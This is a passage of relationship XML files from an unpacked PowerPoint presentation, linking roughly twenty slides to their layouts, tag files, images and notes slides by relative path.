<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1531.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag656.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag655.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag654.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag653.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide171.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1541.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag657.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide172.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag661.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag660.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1551.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag659.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag658.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide173.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1561.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide174.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1571.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide175.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1581.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag667.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag666.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag665.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag664.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag663.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag662.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide176.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag676.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag675.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag674.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag673.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag672.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag671.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag670.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag669.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1591.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag680.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag679.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag678.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag677.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag668.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide177.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1602.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag683.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag682.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag681.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide178.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1612.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag686.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag685.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag684.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide179.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1621.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag690.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag689.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag688.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag687.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag63.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag62.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag61.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag60.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide180.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1631.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag695.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag694.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag693.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag692.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag691.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide181.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1641.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image120.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag699.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag698.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag697.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag696.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide182.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1651.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag703.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag702.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag701.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag700.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide183.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1661.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag707.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag706.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag705.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag704.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide184.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1671.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag711.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag710.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag709.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag708.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide185.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1681.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag715.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag714.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag713.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag712.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide186.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1691.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag719.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag718.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag717.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag716.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide187.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1701.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag723.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag722.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag721.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag720.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide188.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1711.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag727.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag726.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag725.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag724.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide189.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1721.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag728.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21.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide190.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag732.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag731.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1731.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag730.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 